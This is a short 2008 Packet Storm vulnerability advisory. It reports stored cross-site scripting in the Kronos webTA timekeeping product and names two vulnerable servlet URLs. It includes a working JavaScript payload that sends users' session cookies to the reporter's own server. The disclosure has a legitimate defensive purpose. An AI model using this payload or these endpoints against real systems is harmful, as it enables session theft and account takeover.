webta-xss.txt

2008-06-09T00:00:00
ID PACKETSTORM:67097
Type packetstorm
Reporter Alex Eden
Modified 2008-06-09T00:00:00

Description

                                        
                                            `http://www.kronos.com/Products/webTA.htm  
  
webTA is used by thousands of fed. employees.  
  
I did a limited security review of a couple deployments. Because of certain  
contractual limitations I have been able to verify XSS in its Project  
Management module only, but I suspect it also exists in Vacation/Sick Leave  
Request module.  
  
URLs: /servlet/com.threeis.webta.H710selProject and  
/servlet/com.threeis.webta.H720editProjectInfo  
  
Use these URLs to create project descriptions. No hex or html encoding or  
anything fancy is necessary. Just type in the description field your favorite  
XSS stuff - it will work.   
  
I tested basic font changing html tags (<font color="red">test for  
XSS</font>), and JavaScript (<script>document.write('<img  
src="http://ip_of_my_server_on_my_laptop/cookie.cgi?'+document.cookie+'">')</  
script>). On my laptop I had Apache listening, and collecting user session  
information into its logs.  
  
Yeah, it is remote, in case you are wondering.  
  
I no longer have the access to any webTA systems, and cannot verify anything  
else.   
`